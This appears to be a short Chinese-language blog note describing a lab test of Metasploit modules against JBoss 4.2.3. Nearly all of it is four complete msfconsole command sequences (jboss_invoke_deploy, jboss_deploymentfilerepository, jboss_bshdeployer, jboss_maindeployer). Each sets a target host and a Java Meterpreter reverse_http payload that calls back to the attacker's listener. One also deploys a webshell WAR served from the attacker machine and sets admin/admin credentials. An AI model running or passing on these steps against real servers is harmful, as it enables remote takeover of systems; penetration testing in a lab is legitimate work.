MSF中Jboss模組直接利用
- 2019 年 11 月 20 日
- 筆記
實驗環境:
Kali linux 2018
Windows server 2008 x64
JBOSS 4.2.3
安全檢測過程:
在MSF中本身自帶一些針對JBOSS漏洞的攻擊模組,本次測試使用的JBOSS版本為4.2.3。
利用JMXInvokerServlet介面:
1 msf5 > use exploit/multi/http/jboss_invoke_deploy
2 msf5 > set rhosts 192.168.174.129
3 msf5 > set rport 8080
4 msf5 > set targeturi /invoker/JMXInvokerServlet (指定 JMXInvokerServlet 介面路徑)
5 msf5 > set target 1
6 msf5 > set payload java/meterpreter/reverse_http 這裡直接用JAVA payload
7 msf5 > set lhost 192.168.174.130
8 msf5 > set lport 110
9 msf5 > exploit

利用deploymentfilerepository服務:
1 msf5 > use exploit/multi/http/jboss_deploymentfilerepository
2 msf5 > set rhosts 192.168.174.129
3 msf5 > set rport 8080
4 msf5 > set targeturi /jmx‐console
5 msf5 > set verb POST (這裡可以指定不同的請求方法)
6 msf5 > set target 3
7 msf5 > set payloadjava/meterpreter/reverse_http
8 msf5 > set lhost 192.168.174.130
9 msf5 > set lport 110
10 msf5 > exploit

利用BeanShell腳本:
1 msf5 > use exploit/multi/http/jboss_bshdeployer
2 msf5 > set rhosts 192.168.174.129
3 msf5 > set rport 8080
4 msf5 > set verb POST (這裡可以指定不同的請求方法)
5 msf5 > set target 3
6 msf5 > set payload java/meterpreter/reverse_http
7 msf5 > set lhost 192.168.174.130
8 msf5 > set lport 110
9 msf5 > exploit

利用maindeployer遠程部署webshell:
1 msf5 > exploit/multi/http/jboss_maindeployer
2 msf5 > set rhosts 192.168.174.129
3 msf5 > set rport 8080
4 msf5 > set httppassword admin 如果頁面加了基礎認證,需要加上
5 msf5 > set httpusername admin 帳號密碼
6 msf5 > set srvhost 192.168.174.130 (這裡是提供遠程下載war包的webshell:把jsp的webshell打包成war,然後放在自己的伺服器上,如何打包參考:
http://www.mianhuage.com/649.html)
7 msf5 > set target 3
8 msf5 > set payload java/meterpreter/reverse_http
9 msf5 > set lhost 192.168.174.130
10 msf5 > set lport 7777
11 msf5 > exploit

所留痕迹:
以上所使用的模組攻擊成功後都會在JBOSS目錄:
C:jbos.2.3.gaserverdefaulttemdeploy
留下記錄


作者:暖痕 (文章轉載請註明來自:IT同路人論壇)